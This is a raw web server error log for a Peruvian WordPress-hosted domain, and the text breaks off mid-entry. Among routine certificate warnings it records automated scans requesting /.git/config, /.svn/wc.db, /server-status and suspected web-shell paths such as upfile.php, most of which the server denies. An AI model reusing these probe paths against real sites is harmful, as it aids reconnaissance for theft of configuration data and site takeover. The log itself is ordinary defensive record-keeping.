(index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 20:32:39.074145 2024] [autoindex:error] [pid 29080:tid 140354144220928] [client 167.71.243.176:33868] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/PHPMailer/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 20:32:39.077563 2024] [autoindex:error] [pid 29082:tid 140353885628160] [client 167.71.243.176:33870] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/sitemaps/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 20:32:39.084626 2024] [autoindex:error] [pid 29081:tid 140354011518720] [client 167.71.243.176:33872] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/sitemaps/providers/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 20:32:39.088523 2024] [autoindex:error] [pid 29080:tid 140353877235456] [client 167.71.243.176:33874] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Text/Diff/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 20:33:00.876672 2024] [autoindex:error] [pid 29082:tid 140353935984384] [client 167.71.243.176:33976] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 05 20:33:00.879992 2024] [autoindex:error] [pid 29081:tid 140353969555200] [client 167.71.243.176:33978] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/blue/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Jan 06 09:58:10.328300 2024] [:error] [pid 29081:tid 140354135828224] [client 41.216.188.92:54862] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php, referer: www.google.com [Sat Jan 06 09:58:15.408951 2024] [:error] [pid 29081:tid 140353994733312] [client 41.216.188.92:54864] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php, referer: www.google.com [Sat Jan 06 11:40:41.143256 2024] [ssl:warn] [pid 24252:tid 140486849296256] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jan 06 11:40:54.510595 2024] [ssl:warn] [pid 24285:tid 140486849296256] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jan 06 20:59:56.693628 2024] [authz_core:error] [pid 24288:tid 140486551525120] [client 165.232.76.155:37634] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/01/06 21:00:00 [error] 24445#24445: *5399 access forbidden by rule, client: 165.232.76.155, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/01/06 21:01:26 [error] 24445#24445: *5424 access forbidden by rule, client: 35.92.105.159, server: cpanel.investigacionperu.com, request: "GET /public/.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/01/06 21:10:42 [error] 24446#24446: *5465 access forbidden by rule, client: 35.92.105.159, server: cpanel.investigacionperu.com, request: "GET /info/.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/01/06 21:27:25 [error] 24446#24446: *5573 access forbidden by rule, client: 35.92.105.159, server: mail.investigacionperu.com, request: "GET /build/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/01/06 21:28:44 [error] 24446#24446: *5580 access forbidden by rule, client: 35.92.105.159, server: mail.investigacionperu.com, request: "GET /resources/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/01/06 21:59:33 [error] 24445#24445: *5769 access forbidden by rule, client: 35.92.105.159, server: mail.investigacionperu.com, request: "GET /components/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/01/06 22:07:09 [error] 24445#24445: *5796 access forbidden by rule, client: 35.92.105.159, server: mail.investigacionperu.com, request: "GET /private/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/01/06 22:07:20 [error] 24445#24445: *5797 access forbidden by rule, client: 35.92.105.159, server: cpanel.investigacionperu.com, request: "GET /bin/.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/01/06 22:24:06 [error] 24445#24445: *5920 access forbidden by rule, client: 35.92.105.159, server: cpanel.investigacionperu.com, request: "GET /modules/.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/01/06 22:46:40 [error] 24446#24446: *6026 access forbidden by rule, client: 35.92.105.159, server: webmail.investigacionperu.com, request: "GET /database/.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/01/06 22:52:36 [error] 24446#24446: *6081 access forbidden by rule, client: 35.92.105.159, server: webmail.investigacionperu.com, request: "GET /templates/.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/01/06 22:56:14 [error] 24445#24445: *6100 access forbidden by rule, client: 35.92.105.159, server: webmail.investigacionperu.com, request: "GET /info/.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/01/06 23:01:39 [error] 24445#24445: *6121 access forbidden by rule, client: 35.92.105.159, server: cpanel.investigacionperu.com, request: "GET /lib/.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/01/06 23:13:34 [error] 24446#24446: *6225 access forbidden by rule, client: 35.92.105.159, server: webmail.investigacionperu.com, request: "GET /vendor/.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/01/06 23:19:25 [error] 24446#24446: *6282 access forbidden by rule, client: 35.92.105.159, server: mail.investigacionperu.com, request: "GET /public/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/01/06 23:25:44 [error] 24446#24446: *6312 access forbidden by rule, client: 35.92.105.159, server: webmail.investigacionperu.com, request: "GET /data/.git/config HTTP/1.1", host: "webmail.investigacionperu.com" [Sat Jan 06 23:59:31.919695 2024] [autoindex:error] [pid 24385:tid 140486509561600] [client 2.58.113.246:40384] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/coffee/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com//wp-admin/css/colors/coffee/index.php 2024/01/07 00:19:57 [error] 24446#24446: *7247 access forbidden by rule, client: 35.92.105.159, server: webmail.investigacionperu.com, request: "GET /test/.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/01/07 00:22:12 [error] 24445#24445: *7296 access forbidden by rule, client: 35.92.105.159, server: webmail.investigacionperu.com, request: "GET /settings/.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/01/07 01:12:07 [error] 24445#24445: *7790 access forbidden by rule, client: 35.92.105.159, server: cpanel.investigacionperu.com, request: "GET /doc/.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/01/07 01:16:46 [error] 24445#24445: *7837 access forbidden by rule, client: 35.92.105.159, server: cpanel.investigacionperu.com, request: "GET /plugins/.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/01/07 01:43:17 [error] 24446#24446: *8297 access forbidden by rule, client: 35.92.105.159, server: webmail.investigacionperu.com, request: "GET /downloads/.git/config HTTP/1.1", host: "webmail.investigacionperu.com" [Sun Jan 07 01:43:49.404386 2024] [autoindex:error] [pid 24287:tid 140486434027264] [client 20.198.77.56:42322] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/coffee/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Jan 07 01:43:49.805084 2024] [:error] [pid 24286:tid 140486666553088] [client 20.198.77.56:42324] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/license.php [Sun Jan 07 01:43:51.519190 2024] [:error] [pid 24288:tid 140486658160384] [client 20.198.77.56:42328] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php 2024/01/07 01:46:15 [error] 24446#24446: *8403 access forbidden by rule, client: 35.92.105.159, server: mail.investigacionperu.com, request: "GET /blogs/.git/config HTTP/1.1", host: "mail.investigacionperu.com" [Sun Jan 07 03:08:35.210310 2024] [authz_core:error] [pid 24385:tid 140486534739712] [client 167.71.185.75:43694] AH01630: client denied by server configuration: /home/investig/public_html/server-status [Sun Jan 07 03:08:35.691691 2024] [authz_core:error] [pid 24385:tid 140486509561600] [client 167.99.182.39:43700] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/01/07 03:08:38 [error] 24446#24446: *9326 access forbidden by rule, client: 167.71.185.75, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/01/07 03:08:39 [error] 24446#24446: *9329 access forbidden by rule, client: 167.99.182.39, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sun Jan 07 03:16:36.189103 2024] [ssl:warn] [pid 29120:tid 140202540402560] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jan 07 03:16:40.575317 2024] [ssl:warn] [pid 29123:tid 140202540402560] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jan 07 03:16:40.979579 2024] [ssl:warn] [pid 29123:tid 140202540402560] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jan 07 03:16:43.018189 2024] [ssl:warn] [pid 29123:tid 140202540402560] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jan 07 03:16:45.246898 2024] [ssl:warn] [pid 29540:tid 139975153010560] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jan 07 03:16:53.486698 2024] [ssl:warn] [pid 29546:tid 139975153010560] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2024/01/07 05:44:21 [error] 29422#29422: *11157 access forbidden by rule, client: 54.186.174.90, server: cpanel.investigacionperu.com, request: "GET /scripts/.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" [Sun Jan 07 05:45:33.388446 2024] [authz_core:error] [pid 29721:tid 139974804473600] [client 146.190.160.11:46486] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/01/07 05:45:36 [error] 29422#29422: *11198 access forbidden by rule, client: 146.190.160.11, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/01/07 05:56:55 [error] 29423#29423: *11390 access forbidden by rule, client: 54.186.174.90, server: cpanel.investigacionperu.com, request: "GET /database/.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/01/07 05:59:28 [error] 29422#29422: *11444 access forbidden by rule, client: 54.186.174.90, server: mail.investigacionperu.com, request: "GET /downloads/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/01/07 07:13:40 [error] 29423#29423: *12526 access forbidden by rule, client: 54.186.174.90, server: mail.investigacionperu.com, request: "GET /bin/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/01/07 07:44:03 [error] 29422#29422: *12819 access forbidden by rule, client: 54.186.174.90, server: mail.investigacionperu.com, request: "GET /assets/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/01/07 08:39:58 [error] 29423#29423: *13389 access forbidden by rule, client: 54.186.174.90, server: mail.investigacionperu.com, request: "GET /settings/.git/config HTTP/1.1", host: "mail.investigacionperu.com" [Sun Jan 07 16:30:27.087178 2024] [autoindex:error] [pid 29566:tid 139974745724672] [client 142.11.192.246:56752] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/maint/index.php [Sun Jan 07 16:30:30.409980 2024] [autoindex:error] [pid 29721:tid 139974846437120] [client 142.11.192.246:56756] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/maint/index.php [Mon Jan 08 03:46:21.343551 2024] [ssl:warn] [pid 2216:tid 140331880081280] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jan 08 03:46:29.648471 2024] [ssl:warn] [pid 2217:tid 140331880081280] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jan 08 03:46:30.202051 2024] [ssl:warn] [pid 2217:tid 140331880081280] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jan 08 03:46:32.008644 2024] [ssl:warn] [pid 2217:tid 140331880081280] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jan 08 03:46:34.253390 2024] [ssl:warn] [pid 2632:tid 139733200177024] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jan 08 03:46:42.472080 2024] [ssl:warn] [pid 2633:tid 139733200177024] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jan 08 19:03:32.813111 2024] [ssl:warn] [pid 2633:tid 139733200177024] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jan 09 03:49:20.993752 2024] [ssl:warn] [pid 8889:tid 140625461274496] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jan 09 03:49:21.222035 2024] [ssl:warn] [pid 8891:tid 140625461274496] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jan 09 03:49:21.459194 2024] [ssl:warn] [pid 8891:tid 140625461274496] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jan 09 03:49:23.410796 2024] [ssl:warn] [pid 8891:tid 140625461274496] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jan 09 03:49:25.657952 2024] [ssl:warn] [pid 9309:tid 140414799263616] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jan 09 03:49:25.900280 2024] [ssl:warn] [pid 9310:tid 140414799263616] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2024/01/09 13:44:47 [error] 9190#9190: *44590 access forbidden by rule, client: 3.0.148.152, server: webmail.investigacionperu.com, request: "GET /node_modules/.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/01/09 13:47:32 [error] 9189#9189: *44615 access forbidden by rule, client: 3.0.148.152, server: mail.investigacionperu.com, request: "GET /config/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/01/09 14:10:19 [error] 9190#9190: *44882 access forbidden by rule, client: 3.0.148.152, server: cpanel.investigacionperu.com, request: "GET /.svn/wc.db HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/01/09 14:19:19 [error] 9189#9189: *44946 access forbidden by rule, client: 3.0.148.152, server: cpanel.investigacionperu.com, request: "GET /lib/.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/01/09 16:40:51 [error] 9190#9190: *46812 access forbidden by rule, client: 3.0.148.152, server: cpanel.investigacionperu.com, request: "GET /admin/.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/01/09 16:53:22 [error] 9189#9189: *46953 access forbidden by rule, client: 3.0.148.152, server: webmail.investigacionperu.com, request: "GET /api/.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/01/09 16:53:45 [error] 9190#9190: *46961 access forbidden by rule, client: 3.0.148.152, server: webmail.investigacionperu.com, request: "GET /.svn/wc.db HTTP/1.1", host: "webmail.investigacionperu.com" 2024/01/09 17:02:16 [error] 9190#9190: *47056 access forbidden by rule, client: 3.0.148.152, server: mail.investigacionperu.com, request: "GET /app/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/01/09 19:25:15 [error] 9190#9190: *48490 access forbidden by rule, client: 3.0.148.152, server: webmail.investigacionperu.com, request: "GET /includes/.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/01/09 19:31:09 [error] 9189#9189: *48521 access forbidden by rule, client: 3.0.148.152, server: cpanel.investigacionperu.com, request: "GET /api/.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/01/09 19:37:49 [error] 9189#9189: *48564 access forbidden by rule, client: 3.0.148.152, server: mail.investigacionperu.com, request: "GET /modules/.git/config HTTP/1.1", host: "mail.investigacionperu.com" [Wed Jan 10 03:15:45.214726 2024] [ssl:warn] [pid 20927:tid 140084571219840] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jan 10 03:15:53.529807 2024] [ssl:warn] [pid 20930:tid 140084571219840] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jan 10 03:15:53.893981 2024] [ssl:warn] [pid 20930:tid 140084571219840] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jan 10 03:15:55.494448 2024] [ssl:warn] [pid 20930:tid 140084571219840] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jan 10 03:16:02.751195 2024] [ssl:warn] [pid 21346:tid 140387516376960] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jan 10 03:16:19.983627 2024] [ssl:warn] [pid 21359:tid 140387516376960] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jan 11 03:07:37.111375 2024] [ssl:warn] [pid 1190:tid 140166636246912] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jan 11 03:07:45.392011 2024] [ssl:warn] [pid 1194:tid 140166636246912] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jan 11 03:07:45.879819 2024] [ssl:warn] [pid 1194:tid 140166636246912] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jan 11 03:07:47.710351 2024] [ssl:warn] [pid 1194:tid 140166636246912] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jan 11 03:07:49.997191 2024] [ssl:warn] [pid 1629:tid 139847070320512] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jan 11 03:07:58.271973 2024] [ssl:warn] [pid 1631:tid 139847070320512] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jan 11 19:03:37.085533 2024] [ssl:warn] [pid 1631:tid 139847070320512] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jan 12 03:20:27.108772 2024] [ssl:warn] [pid 15130:tid 140556699359104] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jan 12 03:20:35.310487 2024] [ssl:warn] [pid 15131:tid 140556699359104] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jan 12 03:20:35.809498 2024] [ssl:warn] [pid 15131:tid 140556699359104] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jan 12 03:20:37.765602 2024] [ssl:warn] [pid 15131:tid 140556699359104] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jan 12 03:20:39.995031 2024] [ssl:warn] [pid 15547:tid 139943523022720] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jan 12 03:20:44.201299 2024] [ssl:warn] [pid 15549:tid 139943523022720] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jan 12 04:14:04.917748 2024] [autoindex:error] [pid 16213:tid 139943212984064] [client 149.56.22.100:48368] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/maint/index.php [Fri Jan 12 10:44:41.507223 2024] [autoindex:error] [pid 16213:tid 139943340279552] [client 31.11.36.188:53234] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/midnight/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/colors/midnight/index.php [Fri Jan 12 14:20:57.749146 2024] [:error] [pid 16213:tid 139943196198656] [client 217.197.117.40:57882] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/upfile.php, referer: http://simplesite.com [Sat Jan 13 03:37:27.846916 2024] [ssl:warn] [pid 26223:tid 140453862164352] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jan 13 03:37:36.184640 2024] [ssl:warn] [pid 26226:tid 140453862164352] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jan 13 03:37:36.537527 2024] [ssl:warn] [pid 26226:tid 140453862164352] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jan 13 03:37:38.499668 2024] [ssl:warn] [pid 26226:tid 140453862164352] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jan 13 03:37:40.747517 2024] [ssl:warn] [pid 26646:tid 140453281318784] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jan 13 03:37:49.094469 2024] [ssl:warn] [pid 26655:tid 140453281318784] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jan 13 10:46:50.144040 2024] [ssl:warn] [pid 10839:tid 140133952096128] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jan 13 10:47:03.490926 2024] [ssl:warn] [pid 10861:tid 140133952096128] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jan 13 10:47:04.140843 2024] [ssl:warn] [pid 10861:tid 140133952096128] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jan 13 10:47:06.025470 2024] [ssl:warn] [pid 10861:tid 140133952096128] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jan 13 10:47:08.318158 2024] [ssl:warn] [pid 11324:tid 139731618580352] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jan 13 10:47:16.586326 2024] [ssl:warn] [pid 11337:tid 139731618580352] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jan 13 16:47:14.848735 2024] [:error] [pid 11353:tid 139731291584256] [client 20.14.82.90:53368] [client 20.14.82.90] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/html"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "ZaME4mGnd53ji1e75rcCEwAAAIk"] [Sat Jan 13 23:21:56.622183 2024] [ssl:warn] [pid 11337:tid 139731618580352] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jan 13 23:25:45.507233 2024] [:error] [pid 8307:tid 139731299976960] [client 41.216.188.92:57574] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php, referer: www.google.com [Sat Jan 13 23:25:50.664235 2024] [:error] [pid 8307:tid 139731266406144] [client 41.216.188.92:57576] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php, referer: www.google.com [Sun Jan 14 00:39:48.980478 2024] [ssl:warn] [pid 1019:tid 140025673594752] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jan 14 00:39:53.874728 2024] [ssl:warn] [pid 1597:tid 140025673594752] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jan 14 00:41:10.544770 2024] [ssl:warn] [pid 1597:tid 140025673594752] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jan 14 00:57:42.719691 2024] [ssl:warn] [pid 1597:tid 140025673594752] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jan 14 01:05:39.549197 2024] [ssl:warn] [pid 13867:tid 140047798765440] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jan 14 01:05:47.781883 2024] [ssl:warn] [pid 13886:tid 140047798765440] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jan 14 01:06:51.676144 2024] [ssl:warn] [pid 13886:tid 140047798765440] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jan 14 01:14:36.493858 2024] [ssl:warn] [pid 13886:tid 140047798765440] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jan 14 01:21:26.781597 2024] [ssl:warn] [pid 1015:tid 139880830498688] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jan 14 01:21:35.300514 2024] [ssl:warn] [pid 1865:tid 139880830498688] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jan 14 01:25:05.744064 2024] [ssl:warn] [pid 1865:tid 139880830498688] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jan 14 03:19:23.390581 2024] [ssl:warn] [pid 14425:tid 140378654893952] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jan 14 03:19:31.626916 2024] [ssl:warn] [pid 14427:tid 140378654893952] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jan 14 03:19:32.308124 2024] [ssl:warn] [pid 14427:tid 140378654893952] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jan 14 03:19:34.560648 2024] [ssl:warn] [pid 14427:tid 140378654893952] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jan 14 03:19:48.255050 2024] [ssl:warn] [pid 14989:tid 140095748269952] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jan 14 03:19:56.472404 2024] [ssl:warn] [pid 14992:tid 140095748269952] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jan 14 11:10:13.146460 2024] [:error] [pid 14999:tid 140095557129984] [client 81.28.6.249:41464] [client 81.28.6.249] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ 